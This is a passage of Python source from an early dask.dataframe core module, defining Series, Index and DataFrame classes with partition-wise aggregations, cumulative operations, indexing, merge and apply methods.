start + i))\n for i in range(1, stop - start)),\n {(name, stop - start): (_loc, (self._name, stop), None, ind.stop)})\n\n divisions = ((max(istart, self.divisions[start])\n if ind.start is not None\n else self.divisions[0],) +\n self.divisions[start+1:stop+1] +\n (min(istop, self.divisions[stop+1])\n if ind.stop is not None\n else self.divisions[-1],))\n\n assert len(divisions) == len(dsk) + 1\n return self._constructor(merge(self.dask, dsk), name,\n self.column_info, divisions)\n\n @property\n def loc(self):\n \"\"\" Purely label-location based indexer for selection by label.\n\n >>> df.loc[\"b\"] # doctest: +SKIP\n >>> df.loc[\"b\":\"d\"] # doctest: +SKIP\"\"\"\n return IndexCallable(self._loc)\n\n @property\n def iloc(self):\n \"\"\" Not implemented \"\"\"\n\n # not implemented because of performance concerns.\n # see https://github.com/blaze/dask/pull/507\n raise NotImplementedError(\"Dask Dataframe does not support iloc\")\n\n def repartition(self, divisions, force=False):\n \"\"\" Repartition dataframe along new divisions\n\n Parameters\n ----------\n\n divisions: list\n List of partitions to be used\n force: bool, default False\n Allows the expansion of the existing divisions.\n If False then the new divisions lower and upper bounds must be\n the same as the old divisions.\n\n >>> df = df.repartition([0, 5, 10, 20]) # doctest: +SKIP\n \"\"\"\n return repartition(self, divisions, force=force)\n\n def __getstate__(self):\n return self.__dict__\n\n def __setstate__(self, dict):\n self.__dict__ = dict\n\n @wraps(pd.Series.fillna)\n def fillna(self, value):\n func = getattr(self._partition_type, 'fillna')\n return map_partitions(func, self.column_info, self, value)\n\n def sample(self, frac, random_state=None):\n \"\"\" Random sample of items\n\n This only implements the ``frac`` option from pandas.\n\n See Also:\n pd.DataFrame.sample\n \"\"\"\n if random_state is None:\n random_state = np.random.randint(np.iinfo(np.int32).max)\n\n name = 'sample-' + tokenize(self, frac, random_state)\n func = getattr(self._partition_type, 'sample')\n\n if not isinstance(random_state, np.random.RandomState):\n random_state = np.random.RandomState(random_state)\n seeds = random_state.randint(np.iinfo(np.int32).max,\n size=self.npartitions)\n\n dsk = dict(((name, i),\n (apply, func, (tuple, [(self._name, i)]),\n {'frac': frac, 'random_state': seed}))\n for i, seed in zip(range(self.npartitions), seeds))\n\n return self._constructor(merge(self.dask, dsk), name,\n self.column_info, self.divisions)\n\n @wraps(pd.DataFrame.to_hdf)\n def to_hdf(self, path_or_buf, key, mode='a', append=False, complevel=0,\n complib=None, fletcher32=False, **kwargs):\n from .io import to_hdf\n return to_hdf(self, path_or_buf, key, mode, append, complevel, complib,\n fletcher32, **kwargs)\n\n @wraps(pd.DataFrame.to_csv)\n def to_csv(self, filename, **kwargs):\n from .io import to_csv\n return to_csv(self, filename, **kwargs)\n\n @property\n def _elemwise_cols(self):\n \"\"\"passed to elemwise ops, None for Series, columns for DataFrame\"\"\"\n return None\n\n @classmethod\n def _get_unary_operator(cls, op):\n return lambda self: elemwise(op, self, columns=self._elemwise_cols)\n\n @classmethod\n def _get_binary_operator(cls, op, inv=False):\n if inv:\n return lambda self, other: elemwise(op, other, self,\n columns=self._elemwise_cols)\n else:\n return lambda self, other: elemwise(op, self, other,\n columns=self._elemwise_cols)\n\n def _aca_agg(self, token, func, aggfunc=None):\n \"\"\" Wrapper for aggregations \"\"\"\n raise 
NotImplementedError\n\n @wraps(pd.DataFrame.sum)\n def sum(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.sum(axis=1)\n name = '{0}sum(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='sum', func=lambda x: x.sum())\n\n @wraps(pd.DataFrame.max)\n def max(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.max(axis=1)\n name = '{0}max(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='max', func=lambda x: x.max())\n\n @wraps(pd.DataFrame.min)\n def min(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.min(axis=1)\n name = '{0}min(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='min', func=lambda x: x.min())\n\n @wraps(pd.DataFrame.count)\n def count(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.count(axis=1)\n name = '{0}count(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n return self._aca_agg(token='count', func=lambda x: x.count(),\n aggfunc=lambda x: x.sum())\n\n @wraps(pd.DataFrame.mean)\n def mean(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x: x.mean(axis=1)\n name = '{0}mean(axis=1)'.format(self._token_prefix)\n return map_partitions(f, None, self, token=name)\n else:\n num = self._get_numeric_data()\n s = num.sum()\n n = num.count()\n\n def f(s, n):\n try:\n return s / n\n except ZeroDivisionError:\n return np.nan\n name = '{0}mean-{1}'.format(self._token_prefix, tokenize(s))\n return map_partitions(f, no_default, s, n, token=name)\n\n @wraps(pd.DataFrame.var)\n def var(self, axis=None, ddof=1):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x, ddof=ddof: x.var(axis=1, ddof=ddof)\n name = '{0}var(axis=1, ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(f, None, self, token=name)\n else:\n num = self._get_numeric_data()\n x = 1.0 * num.sum()\n x2 = 1.0 * (num ** 2).sum()\n n = num.count()\n\n def f(x2, x, n):\n try:\n result = (x2 / n) - (x / n)**2\n if ddof:\n result = result * n / (n - ddof)\n return result\n except ZeroDivisionError:\n return np.nan\n name = '{0}var(ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(f, no_default, x2, x, n, token=name)\n\n @wraps(pd.DataFrame.std)\n def std(self, axis=None, ddof=1):\n axis = self._validate_axis(axis)\n if axis == 1:\n f = lambda x, ddof=ddof: x.std(axis=1, ddof=ddof)\n name = '{0}std(axis=1, ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(f, None, self, token=name)\n else:\n v = self.var(ddof=ddof)\n name = '{0}std(ddof={1})'.format(self._token_prefix, ddof)\n return map_partitions(np.sqrt, no_default, v, token=name)\n\n def quantile(self, q=0.5, axis=0):\n \"\"\" Approximate row-wise and precise column-wise quantiles of DataFrame\n\n q : list/array of floats, default 0.5 (50%)\n Iterable of numbers ranging from 0 to 1 for the desired quantiles\n axis : {0, 1, 'index', 'columns'} (default 0)\n 0 or 'index' for row-wise, 1 or 'columns' for column-wise\n \"\"\"\n axis = self._validate_axis(axis)\n name = 'quantiles-concat--' + tokenize(self, q, axis)\n\n if axis == 1:\n if isinstance(q, list):\n # Not supported, the result will have current index as columns\n raise ValueError(\"'q' must be scalar when 
axis=1 is specified\")\n return map_partitions(pd.DataFrame.quantile, None, self,\n q, axis, token=name)\n else:\n num = self._get_numeric_data()\n quantiles = tuple(quantile(self[c], q) for c in num.columns)\n\n dask = {}\n dask = merge(dask, *[q.dask for q in quantiles])\n qnames = [(q._name, 0) for q in quantiles]\n\n if isinstance(quantiles[0], Scalar):\n dask[(name, 0)] = (pd.Series, (list, qnames), num.columns)\n divisions = (min(num.columns), max(num.columns))\n return Series(dask, name, num.columns, divisions)\n else:\n from .multi import _pdconcat\n dask[(name, 0)] = (_pdconcat, (list, qnames), 1)\n return DataFrame(dask, name, num.columns,\n quantiles[0].divisions)\n\n def _cum_agg(self, token, chunk, aggregate, agginit):\n \"\"\" Wrapper for cumulative operation \"\"\"\n # cumulate each partition\n name1 = '{0}{1}-map'.format(self._token_prefix, token)\n cumpart = map_partitions(chunk, self.column_info, self, token=name1)\n # take last element of each cumulated partition\n name2 = '{0}{1}-take-last'.format(self._token_prefix, token)\n cumlast = map_partitions(lambda x: x.iloc[-1],\n self.column_info, cumpart, token=name2)\n\n name = '{0}{1}'.format(self._token_prefix, token)\n cname = '{0}{1}-cum-last'.format(self._token_prefix, token)\n\n # aggregate cumulated partitions and their previous last element\n dask = {}\n if isinstance(self, DataFrame):\n agginit = pd.Series(agginit, index=self.column_info)\n dask[(cname, 0)] = agginit\n dask[(name, 0)] = (cumpart._name, 0)\n for i in range(1, self.npartitions):\n # store each cumulative step to graph to reduce computation\n dask[(cname, i)] = (aggregate, (cname, i - 1),\n (cumlast._name, i - 1))\n dask[(name, i)] = (aggregate, (cumpart._name, i), (cname, i))\n return self._constructor(merge(dask, cumpart.dask, cumlast.dask),\n name, self.column_info, self.divisions)\n\n @wraps(pd.DataFrame.cumsum)\n def cumsum(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cumsum(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cumsum,\n self.column_info, self, 1, token=name)\n else:\n return self._cum_agg('cumsum', self._partition_type.cumsum,\n operator.add, 0)\n\n @wraps(pd.DataFrame.cumprod)\n def cumprod(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cumprod(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cumprod,\n self.column_info, self, 1, token=name)\n else:\n return self._cum_agg('cumprod', self._partition_type.cumprod,\n operator.mul, 1)\n\n @wraps(pd.DataFrame.cummax)\n def cummax(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cummax(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cummax,\n self.column_info, self, 1, token=name)\n else:\n def aggregate(x, y):\n if isinstance(x, (pd.Series, pd.DataFrame)):\n return x.where(x > y, y, axis=x.ndim - 1)\n else: # scalar\n return x if x > y else y\n return self._cum_agg('cummax', self._partition_type.cummax,\n aggregate, np.nan)\n\n @wraps(pd.DataFrame.cummin)\n def cummin(self, axis=None):\n axis = self._validate_axis(axis)\n if axis == 1:\n name = '{0}cummin(axis=1)'.format(self._token_prefix)\n return map_partitions(self._partition_type.cummin,\n self.column_info, self, 1, token=name)\n else:\n def aggregate(x, y):\n if isinstance(x, (pd.Series, pd.DataFrame)):\n return x.where(x < y, y, axis=x.ndim - 1)\n else: # scalar\n return x if x < y else y\n return self._cum_agg('cummin', 
self._partition_type.cummin,\n                                 aggregate, np.nan)\n\n    @classmethod\n    def _bind_operator_method(cls, name, op):\n        \"\"\" bind operator method like DataFrame.add to this class \"\"\"\n        raise NotImplementedError\n\n\nnormalize_token.register((Scalar, _Frame), lambda a: a._name)\n\n\nclass Series(_Frame):\n    \"\"\" Out-of-core Series object\n\n    Mimics ``pandas.Series``.\n\n    See Also\n    --------\n\n    dask.dataframe.DataFrame\n    \"\"\"\n\n    _partition_type = pd.Series\n    _token_prefix = 'series-'\n\n    def __init__(self, dsk, _name, name, divisions):\n        self.dask = dsk\n        self._name = _name\n        self.name = name\n        self.divisions = tuple(divisions)\n        self.dt = DatetimeAccessor(self)\n        self.str = StringAccessor(self)\n\n    @property\n    def _args(self):\n        return (self.dask, self._name, self.name, self.divisions)\n\n    @property\n    def _constructor_sliced(self):\n        return Scalar\n\n    @property\n    def _constructor(self):\n        return Series\n\n    @property\n    def _empty_partition(self):\n        \"\"\" Return empty dummy to emulate the result \"\"\"\n        return self._partition_type(name=self.name)\n\n    @property\n    def ndim(self):\n        \"\"\" Return dimensionality \"\"\"\n        return 1\n\n    @property\n    def dtype(self):\n        \"\"\" Return data type \"\"\"\n        return self.head().dtype\n\n    @property\n    def column_info(self):\n        \"\"\" Return Series.name \"\"\"\n        return self.name\n\n    @property\n    def columns(self):\n        \"\"\" Return 1 element tuple containing the name \"\"\"\n        return (self.name,)\n\n    @property\n    def nbytes(self):\n        return reduction(self, lambda s: s.nbytes, np.sum, token='nbytes')\n\n    def __repr__(self):\n        return (\"dd.%s<%s, divisions=%s>\" %\n                (self.__class__.__name__, self._name,\n                 repr_long_list(self.divisions)))\n\n    def __array__(self, dtype=None, **kwargs):\n        x = np.array(self.compute())\n        if dtype and x.dtype != dtype:\n            x = x.astype(dtype)\n        return x\n\n    def __array_wrap__(self, array, context=None):\n        return pd.Series(array, name=self.name)\n\n    def quantile(self, q=0.5):\n        \"\"\" Approximate quantiles of Series\n\n        q : list/array of floats, default 0.5 (50%)\n            Iterable of numbers ranging from 0 to 1 for the desired quantiles\n        \"\"\"\n        return quantile(self, q)\n\n    def resample(self, rule, how='mean', axis=0, fill_method=None, closed=None,\n                 label=None, convention='start', kind=None, loffset=None,\n                 limit=None, base=0):\n        \"\"\"Group values by a DatetimeIndex into time periods of size `rule`.\n\n        Parameters\n        ----------\n        rule : str or pandas.datetools.Tick\n            The frequency to resample by. For example, 'H' is one hour\n            intervals.\n        how : str or callable\n            Method to use to summarize your data. 
For example, 'mean' takes the\n average value of the Series in the time interval `rule`.\n\n Notes\n -----\n For additional argument descriptions please consult the pandas\n documentation.\n\n Returns\n -------\n dask.dataframe.Series\n\n See Also\n --------\n pandas.Series.resample\n \"\"\"\n\n divs = pd.Series(range(len(self.divisions)), index=self.divisions)\n temp = divs.resample(rule, how='count', axis=axis, fill_method=fill_method,\n closed=closed, label=label, convention=convention,\n kind=kind, loffset=loffset, limit=limit, base=base)\n newdivs = temp.loc[temp > 0].index.tolist()\n if newdivs[-1] < self.divisions[-1]:\n newdivs.append(self.divisions[-1])\n if newdivs[0] > self.divisions[0]:\n newdivs.insert(0, self.divisions[0])\n\n day_nanos = pd.datetools.Day().nanos\n\n rule = pd.datetools.to_offset(rule)\n\n if getattr(rule, 'nanos', None) and day_nanos % rule.nanos:\n raise NotImplementedError('Resampling frequency %s that does'\n ' not evenly divide a day is not '\n 'implemented' % rule)\n\n return map_partitions(pd.Series.resample, self.name,\n self.repartition(newdivs, force=True),\n rule=rule, how=how, axis=axis,\n fill_method=fill_method, closed=closed, label=label,\n convention=convention, kind=kind, loffset=loffset, limit=limit,\n base=base)\n\n def __getitem__(self, key):\n if isinstance(key, Series) and self.divisions == key.divisions:\n name = 'series-index-%s[%s]' % (self._name, key._name)\n dsk = dict(((name, i), (operator.getitem, (self._name, i),\n (key._name, i)))\n for i in range(self.npartitions))\n return Series(merge(self.dask, key.dask, dsk), name,\n self.name, self.divisions)\n raise NotImplementedError()\n\n @wraps(pd.DataFrame._get_numeric_data)\n def _get_numeric_data(self, how='any', subset=None):\n return self\n\n @classmethod\n def _validate_axis(cls, axis=0):\n if axis not in (0, 'index', None):\n raise ValueError('No axis named {0}'.format(axis))\n # convert to numeric axis\n return {None: 0, 'index': 0}.get(axis, axis)\n\n def _aca_agg(self, token, func, aggfunc=None):\n \"\"\" Wrapper for aggregations \"\"\"\n if aggfunc is None:\n aggfunc = func\n\n return aca([self], chunk=func,\n aggregate=lambda x: aggfunc(pd.Series(x)),\n columns=return_scalar, token=self._token_prefix + token)\n\n @wraps(pd.Series.groupby)\n def groupby(self, index, **kwargs):\n return SeriesGroupBy(self, index, **kwargs)\n\n @wraps(pd.Series.sum)\n def sum(self, axis=None):\n return super(Series, self).sum(axis=axis)\n\n @wraps(pd.Series.max)\n def max(self, axis=None):\n return super(Series, self).max(axis=axis)\n\n @wraps(pd.Series.min)\n def min(self, axis=None):\n return super(Series, self).min(axis=axis)\n\n @wraps(pd.Series.count)\n def count(self):\n return super(Series, self).count()\n\n @wraps(pd.Series.mean)\n def mean(self, axis=None):\n return super(Series, self).mean(axis=axis)\n\n @wraps(pd.Series.var)\n def var(self, axis=None, ddof=1):\n return super(Series, self).var(axis=axis, ddof=ddof)\n\n @wraps(pd.Series.std)\n def std(self, axis=None, ddof=1):\n return super(Series, self).std(axis=axis, ddof=ddof)\n\n @wraps(pd.Series.cumsum)\n def cumsum(self, axis=None):\n return super(Series, self).cumsum(axis=axis)\n\n @wraps(pd.Series.cumprod)\n def cumprod(self, axis=None):\n return super(Series, self).cumprod(axis=axis)\n\n @wraps(pd.Series.cummax)\n def cummax(self, axis=None):\n return super(Series, self).cummax(axis=axis)\n\n @wraps(pd.Series.cummin)\n def cummin(self, axis=None):\n return super(Series, self).cummin(axis=axis)\n\n 
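# A small usage sketch (hypothetical data; assumes the ``from_pandas``\n    # constructor from .io, used elsewhere in this module, with the package\n    # imported as ``dd``):\n    #\n    #     >>> s = dd.from_pandas(pd.Series([1, 2, 3, 4]), 2)  # doctest: +SKIP\n    #     >>> s.sum().compute()     # per-partition chunk + aggregate via _aca_agg\n    #     10\n    #     >>> s.cumsum().compute()  # partitions chained via _cum_agg\n    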
@wraps(pd.Series.nunique)\n    def nunique(self):\n        return self.drop_duplicates().count()\n\n    @wraps(pd.Series.value_counts)\n    def value_counts(self):\n        chunk = lambda s: s.value_counts()\n        if LooseVersion(pd.__version__) > '0.16.2':\n            agg = lambda s: s.groupby(level=0).sum().sort_values(ascending=False)\n        else:\n            agg = lambda s: s.groupby(level=0).sum().sort(inplace=False, ascending=False)\n        return aca(self, chunk=chunk, aggregate=agg, columns=self.name,\n                   token='value-counts')\n\n    @wraps(pd.Series.nlargest)\n    def nlargest(self, n=5):\n        return nlargest(self, n)\n\n    @wraps(pd.Series.isin)\n    def isin(self, other):\n        return elemwise(pd.Series.isin, self, other)\n\n    @wraps(pd.Series.map)\n    def map(self, arg, na_action=None):\n        return elemwise(pd.Series.map, self, arg, na_action, name=self.name)\n\n    @wraps(pd.Series.astype)\n    def astype(self, dtype):\n        return map_partitions(pd.Series.astype, self.name, self, dtype)\n\n    @wraps(pd.Series.dropna)\n    def dropna(self):\n        return map_partitions(pd.Series.dropna, self.name, self)\n\n    @wraps(pd.Series.between)\n    def between(self, left, right, inclusive=True):\n        return map_partitions(pd.Series.between, self.name, self, left, right,\n                              inclusive)\n\n    @wraps(pd.Series.clip)\n    def clip(self, lower=None, upper=None):\n        return map_partitions(pd.Series.clip, self.name, self, lower, upper)\n\n    @wraps(pd.Series.notnull)\n    def notnull(self):\n        return map_partitions(pd.Series.notnull, self.name, self)\n\n    def to_bag(self, index=False):\n        \"\"\"Convert to a dask Bag.\n\n        Parameters\n        ----------\n        index : bool, optional\n            If True, the elements are tuples of ``(index, value)``, otherwise\n            they're just the ``value``. Default is False.\n        \"\"\"\n        from .io import to_bag\n        return to_bag(self, index)\n\n    @wraps(pd.Series.to_frame)\n    def to_frame(self, name=None):\n        _name = name if name is not None else self.name\n        return map_partitions(pd.Series.to_frame, [_name], self, name)\n\n    @classmethod\n    def _bind_operator_method(cls, name, op):\n        \"\"\" bind operator method like DataFrame.add to this class \"\"\"\n\n        def meth(self, other, level=None, fill_value=None, axis=0):\n            if level is not None:\n                raise NotImplementedError('level must be None')\n            return map_partitions(op, self.column_info, self, other,\n                                  axis=axis, fill_value=fill_value)\n        meth.__doc__ = op.__doc__\n        bind_method(cls, name, meth)\n\n    def apply(self, func, convert_dtype=True, name=no_default, args=(), **kwds):\n        \"\"\" Parallel version of pandas.Series.apply \"\"\"\n        if name is no_default:\n            name = self.name\n        return map_partitions(pd.Series.apply, name, self, func,\n                              convert_dtype, args, **kwds)\n\n\nclass Index(Series):\n\n    _token_prefix = 'index-'\n\n    @property\n    def index(self):\n        msg = \"'{0}' object has no attribute 'index'\"\n        raise AttributeError(msg.format(self.__class__.__name__))\n\n    @property\n    def _constructor(self):\n        return Index\n\n    def nunique(self):\n        return self.drop_duplicates().count()\n\n    def count(self):\n        f = lambda x: pd.notnull(x).sum()\n        return reduction(self, f, np.sum, token='index-count')\n\n\nclass DataFrame(_Frame):\n    \"\"\"\n    Implements out-of-core DataFrame as a sequence of pandas DataFrames\n\n    Parameters\n    ----------\n\n    dask: dict\n        The dask graph to compute this DataFrame\n    name: str\n        The key prefix that specifies which keys in the dask comprise this\n        particular DataFrame\n    columns: list of strings\n        Column names. 
This metadata aids usability\n divisions: tuple of index values\n Values along which we partition our blocks on the index\n \"\"\"\n\n _partition_type = pd.DataFrame\n _token_prefix = 'dataframe-'\n\n def __init__(self, dask, name, columns, divisions):\n self.dask = dask\n self._name = name\n self.columns = tuple(columns)\n self.divisions = tuple(divisions)\n\n @property\n def _args(self):\n return (self.dask, self._name, self.columns, self.divisions)\n\n @property\n def _constructor_sliced(self):\n return Series\n\n @property\n def _constructor(self):\n return DataFrame\n\n @property\n def _empty_partition(self):\n \"\"\" Return empty dummy to emulate the result \"\"\"\n return self._partition_type(columns=self.columns)\n\n def __getitem__(self, key):\n if np.isscalar(key):\n name = '{0}.{1}'.format(self._name, key)\n if key in self.columns:\n dsk = dict(((name, i), (operator.getitem, (self._name, i), key))\n for i in range(self.npartitions))\n return self._constructor_sliced(merge(self.dask, dsk), name,\n key, self.divisions)\n else:\n raise KeyError(key)\n if isinstance(key, list):\n name = '%s[%s]' % (self._name, str(key))\n if all(k in self.columns for k in key):\n dsk = dict(((name, i), (operator.getitem,\n (self._name, i),\n (list, key)))\n for i in range(self.npartitions))\n return self._constructor(merge(self.dask, dsk), name,\n key, self.divisions)\n else:\n raise KeyError([k for k in key if k not in self.columns])\n if isinstance(key, Series):\n if self.divisions != key.divisions:\n from .multi import _maybe_align_partitions\n self, key = _maybe_align_partitions([self, key])\n name = 'series-slice-%s[%s]' % (self._name, key._name)\n dsk = dict(((name, i), (self._partition_type._getitem_array,\n (self._name, i),\n (key._name, i)))\n for i in range(self.npartitions))\n return self._constructor(merge(self.dask, key.dask, dsk), name,\n self.columns, self.divisions)\n raise NotImplementedError(key)\n\n def __getattr__(self, key):\n try:\n return object.__getattribute__(self, key)\n except AttributeError as e:\n try:\n return self[key]\n except KeyError as e:\n raise AttributeError(e)\n\n def __dir__(self):\n return sorted(set(dir(type(self)) + list(self.__dict__) +\n list(self.columns)))\n\n def __repr__(self):\n return (\"dd.DataFrame<%s, divisions=%s>\" %\n (self._name, repr_long_list(self.divisions)))\n\n @property\n def ndim(self):\n \"\"\" Return dimensionality \"\"\"\n return 2\n\n @property\n def dtypes(self):\n \"\"\" Return data types \"\"\"\n return self._get(self.dask, self._keys()[0]).dtypes\n\n @wraps(pd.DataFrame.set_index)\n def set_index(self, other, **kwargs):\n from .shuffle import set_index\n return set_index(self, other, **kwargs)\n\n def set_partition(self, column, divisions, **kwargs):\n \"\"\" Set explicit divisions for new column index\n\n >>> df2 = df.set_partition('new-index-column', divisions=[10, 20, 50]) # doctest: +SKIP\n\n See also:\n set_index\n \"\"\"\n from .shuffle import set_partition\n return set_partition(self, column, divisions, **kwargs)\n\n @property\n def column_info(self):\n \"\"\" Return DataFrame.columns \"\"\"\n return self.columns\n\n def nlargest(self, n=5, columns=None):\n \"\"\"\n Return the rows which contain the largest n elements from the provided\n column, in descending order.\n \"\"\"\n return nlargest(self, n, columns)\n\n @wraps(pd.DataFrame.groupby)\n def groupby(self, key, **kwargs):\n return GroupBy(self, key, **kwargs)\n\n def categorize(self, columns=None, **kwargs):\n return categorize(self, columns, **kwargs)\n\n 
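# A small sketch of the __getitem__ paths above (hypothetical column names;\n    # assumes the usual ``from_pandas`` constructor, package imported as ``dd``):\n    #\n    #     >>> df = dd.from_pandas(pd.DataFrame({'x': [1, 2], 'y': [3, 4]}), 1)  # doctest: +SKIP\n    #     >>> df['x']         # scalar key -> Series via operator.getitem\n    #     >>> df[['y', 'x']]  # list key -> DataFrame with those columns\n    #     >>> df[df.x > 1]    # Series key -> boolean row selection\n    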
@wraps(pd.DataFrame.assign)\n def assign(self, **kwargs):\n pairs = list(sum(kwargs.items(), ()))\n\n # Figure out columns of the output\n df = pd.DataFrame(columns=self.columns)\n df2 = df.assign(**dict((k, []) for k in kwargs))\n\n return elemwise(_assign, self, *pairs, columns=list(df2.columns))\n\n @wraps(pd.DataFrame.rename)\n def rename(self, index=None, columns=None):\n if index is not None:\n raise ValueError(\"Cannot rename index.\")\n column_info = (pd.DataFrame(columns=self.column_info)\n .rename(columns=columns).columns)\n func = pd.DataFrame.rename\n # *args here is index, columns but columns arg is already used\n return map_partitions(func, column_info, self, None, columns)\n\n def query(self, expr, **kwargs):\n \"\"\" Blocked version of pd.DataFrame.query\n\n This is like the sequential version except that this will also happen\n in many threads. This may conflict with ``numexpr`` which will use\n multiple threads itself. We recommend that you set numexpr to use a\n single thread\n\n import numexpr\n numexpr.set_nthreads(1)\n\n The original docstring follows below:\\n\n \"\"\" + pd.DataFrame.query.__doc__\n name = '%s.query(%s)' % (self._name, expr)\n if kwargs:\n name = name + '--' + tokenize(kwargs)\n dsk = dict(((name, i), (apply, pd.DataFrame.query,\n ((self._name, i), (expr,), kwargs)))\n for i in range(self.npartitions))\n else:\n dsk = dict(((name, i), (pd.DataFrame.query, (self._name, i), expr))\n for i in range(self.npartitions))\n\n return self._constructor(merge(dsk, self.dask), name,\n self.columns, self.divisions)\n\n @wraps(pd.DataFrame.dropna)\n def dropna(self, how='any', subset=None):\n def f(df, how=how, subset=subset):\n return df.dropna(how=how, subset=subset)\n return map_partitions(f, self.columns, self)\n\n def to_castra(self, fn=None, categories=None, sorted_index_column=None,\n compute=True):\n \"\"\" Write DataFrame to Castra on-disk store\n\n See https://github.com/blosc/castra for details\n\n See Also:\n Castra.to_dask\n \"\"\"\n from .io import to_castra\n return to_castra(self, fn, categories, sorted_index_column,\n compute=compute)\n\n def to_bag(self, index=False):\n \"\"\"Convert to a dask Bag of tuples of each row.\n\n Parameters\n ----------\n index : bool, optional\n If True, the index is included as the first element of each tuple.\n Default is False.\n \"\"\"\n from .io import to_bag\n return to_bag(self, index)\n\n @cache_readonly\n def _numeric_columns(self):\n # Cache to avoid repeated calls\n dummy = self._get(self.dask, self._keys()[0])._get_numeric_data()\n return dummy.columns.tolist()\n\n @wraps(pd.DataFrame._get_numeric_data)\n def _get_numeric_data(self, how='any', subset=None):\n if len(self._numeric_columns) < len(self.columns):\n name = self._token_prefix + '-get_numeric_data'\n return map_partitions(pd.DataFrame._get_numeric_data,\n self._numeric_columns, self, token=name)\n else:\n # use current data if unchanged\n return self\n\n @classmethod\n def _validate_axis(cls, axis=0):\n if axis not in (0, 1, 'index', 'columns', None):\n raise ValueError('No axis named {0}'.format(axis))\n # convert to numeric axis\n return {None: 0, 'index': 0, 'columns': 1}.get(axis, axis)\n\n def _aca_agg(self, token, func, aggfunc=None):\n \"\"\" Wrapper for aggregations \"\"\"\n if aggfunc is None:\n aggfunc = func\n\n return aca([self], chunk=func,\n aggregate=lambda x: aggfunc(x.groupby(level=0)),\n columns=None, token=self._token_prefix + token)\n\n @property\n def _elemwise_cols(self):\n return self.columns\n\n @wraps(pd.DataFrame.drop)\n 
def drop(self, labels, axis=0):\n        if axis != 1:\n            raise NotImplementedError(\"Drop currently only works for axis=1\")\n\n        columns = list(pd.DataFrame(columns=self.columns)\n                       .drop(labels, axis=axis)\n                       .columns)\n        return elemwise(pd.DataFrame.drop, self, labels, axis, columns=columns)\n\n    @wraps(pd.DataFrame.merge)\n    def merge(self, right, how='inner', on=None, left_on=None, right_on=None,\n              left_index=False, right_index=False,\n              suffixes=('_x', '_y'), npartitions=None):\n\n        if not isinstance(right, (DataFrame, pd.DataFrame)):\n            raise ValueError('right must be DataFrame')\n\n        from .multi import merge\n        return merge(self, right, how=how, on=on,\n                     left_on=left_on, right_on=right_on,\n                     left_index=left_index, right_index=right_index,\n                     suffixes=suffixes, npartitions=npartitions)\n\n    @wraps(pd.DataFrame.join)\n    def join(self, other, on=None, how='left',\n             lsuffix='', rsuffix='', npartitions=None):\n\n        if not isinstance(other, (DataFrame, pd.DataFrame)):\n            raise ValueError('other must be DataFrame')\n\n        from .multi import merge\n        return merge(self, other, how=how,\n                     left_index=on is None, right_index=True,\n                     left_on=on, suffixes=[lsuffix, rsuffix],\n                     npartitions=npartitions)\n\n    @classmethod\n    def _bind_operator_method(cls, name, op):\n        \"\"\" bind operator method like DataFrame.add to this class \"\"\"\n\n        # name must be explicitly passed for div method whose name is truediv\n\n        def meth(self, other, axis='columns', level=None, fill_value=None):\n            if level is not None:\n                raise NotImplementedError('level must be None')\n\n            axis = self._validate_axis(axis)\n\n            right = None\n            if axis == 1:\n                # when axis=1, a pandas Series is added to each row;\n                # this is not supported for dd.Series.\n                # dd.DataFrame is not affected as op is applied elemwise\n                if isinstance(other, Series):\n                    msg = 'Unable to {0} dd.Series with axis=1'.format(name)\n                    raise ValueError(msg)\n                elif isinstance(other, pd.Series):\n                    right = other.index\n            if isinstance(other, (DataFrame, pd.DataFrame)):\n                right = other.columns\n\n            if right is not None:\n                left = pd.DataFrame(columns=self.columns)\n                right = pd.DataFrame(columns=right)\n                columns = op(left, right, axis=axis).columns.tolist()\n            else:\n                columns = self.columns\n\n            return map_partitions(op, columns, self, other,\n                                  axis=axis, fill_value=fill_value)\n        meth.__doc__ = op.__doc__\n        bind_method(cls, name, meth)\n\n    def apply(self, func, axis=0, args=(), columns=no_default, **kwds):\n        \"\"\" Parallel version of pandas.DataFrame.apply\n\n        This mimics the pandas version except for the following:\n\n        1. The user must specify axis=1 explicitly\n        2. 
The user must provide output columns or column\n \"\"\"\n if axis == 0:\n raise NotImplementedError(\n \"dd.DataFrame.apply only supports axis=1\\n\"\n \" Try: df.apply(func, axis=1)\")\n\n if columns is no_default:\n raise ValueError(\n \"Please supply column names of output dataframe or series\\n\"\n \" Before: df.apply(func)\\n\"\n \" After: df.apply(func, columns=['x', 'y']) for dataframe result\\n\"\n \" or: df.apply(func, columns='x') for series result\")\n\n return map_partitions(pd.DataFrame.apply, columns, self, func, axis,\n False, False, None, args, **kwds)\n\n\n# bind operators\nfor op in [operator.abs, operator.add, operator.and_, operator_div,\n operator.eq, operator.gt, operator.ge, operator.inv,\n operator.lt, operator.le, operator.mod, operator.mul,\n operator.ne, operator.neg, operator.or_, operator.pow,\n operator.sub, operator.truediv, operator.floordiv, operator.xor]:\n _Frame._bind_operator(op)\n Scalar._bind_operator(op)\n\nfor name in ['add', 'sub', 'mul', 'div',\n 'truediv', 'floordiv', 'mod', 'pow',\n 'radd', 'rsub', 'rmul', 'rdiv',\n 'rtruediv', 'rfloordiv', 'rmod', 'rpow']:\n meth = getattr(pd.DataFrame, 